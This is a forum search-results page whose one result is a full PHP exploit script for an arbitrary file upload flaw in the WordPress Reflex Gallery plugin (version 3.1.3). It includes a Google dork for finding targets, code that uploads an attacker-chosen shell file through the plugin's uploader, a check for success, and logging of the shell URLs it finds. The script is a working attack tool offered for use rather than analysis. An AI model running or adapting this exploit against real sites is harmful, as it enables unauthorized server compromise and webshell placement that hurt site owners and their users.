Jump to content

Search the Community

Showing results for tags 'reflex'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Occupation


Interests


Biography


Location

Found 1 result

  1. <?php /* # Exploit Title: Wordpress Plugin Reflex Gallery - Arbitrary File Upload # TIPE: Arbitrary File Upload # Google DORK: inurl:"wp-content/plugins/reflex-gallery/" # Vendor: https://wordpress.org/plugins/reflex-gallery/ # Tested on: Linux # Version: 3.1.3 (Last) # EXECUTE: php exploit.php www.alvo.com.br shell.php # OUTPUT: Exploit_AFU.txt # POC http://i.imgur.com/mpjXaZ9.png # REF COD http://1337day.com/exploit/23369 -------------------------------------------------------------------------------- <form method = "POST" action = "" enctype = "multipart/form-data" > <input type = "file" name = "qqfile"><br> <input type = "submit" name = "Submit" value = "Pwn!"> </form > -------------------------------------------------------------------------------- # AUTOR: Cleiton Pinheiro / Nick: googleINURL # Blog: http://blog.inurl.com.br # Twitter: https://twitter.com/googleinurl # Fanpage: https://fb.com/InurlBrasil # Pastebin http://pastebin.com/u/Googleinurl # GIT: https://github.com/googleinurl # PSS: http://packetstormsecurity.com/user/googleinurl/ # YOUTUBE https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA */ error_reporting(1); set_time_limit(0); ini_set('display_errors', 1); ini_set('max_execution_time', 0); ini_set('allow_url_fopen', 1); ob_implicit_flush(true); ob_end_flush(); function __plus() { ob_flush(); flush(); } function __request($params) { $objcurl = curl_init(); curl_setopt($objcurl, CURLOPT_URL, "{$params['host']}/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php?Year=2015&Month=03"); curl_setopt($objcurl, CURLOPT_POST, 1); curl_setopt($objcurl, CURLOPT_HEADER, 1); curl_setopt($objcurl, CURLOPT_REFERER, $params['host']); curl_setopt($objcurl, CURLOPT_POSTFIELDS, array('qqfile' => "@{$params['file']}")); curl_setopt($objcurl, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($objcurl, CURLOPT_CONNECTTIMEOUT, 10); curl_setopt($objcurl, CURLOPT_RETURNTRANSFER, 1); $info['corpo'] = curl_exec($objcurl) . __plus(); $info['server'] = curl_getinfo($objcurl) . __plus(); curl_close($objcurl) . __plus(); return $info; } echo "[+] Wordpress Plugin Reflex Gallery - Arbitrary File Upload Vulnerability\n\n"; $params = array('file' => isset($argv[2]) ? $argv[2] : exit("\n0x[ERRO] DEFINE FILE SHELL!\n"), 'host' => isset($argv[1]) ? (strstr($argv[1], 'http') ? $argv[1] : "http://{$argv[1]}") : exit("\n0x[ERRO] DEFINE TARGET!\n")); __request($params) . __plus(); $_s = "{$params['host']}/wp-content/uploads/2015/03/{$params['file']}"; $_h = get_headers("{$params['host']}/wp-content/uploads/2015/03/{$params['file']}", 1); foreach ($_h as $key => $value) { echo date("h:m:s") . " [INFO][{$key}]:: {$value}\n"; } $_x = (strstr(($_h[0] . (isset($_h[1]) ? $_h[1] : NULL)), '200')); print "\n" . date("h:m:s") . " [INFO][COD]:: " . (!empty($_x) ? '[+] VULL' : '[-] NOT VULL'); print "\n" . date("h:m:s") . " [INFO][SHELL]:: " . (!empty($_x) ? "[+] {$_s}" . file_put_contents("Exploit_AFU.txt", "{$_s}\n\n", FILE_APPEND) : '[-] ERROR!'); Source
×
×
  • Create New...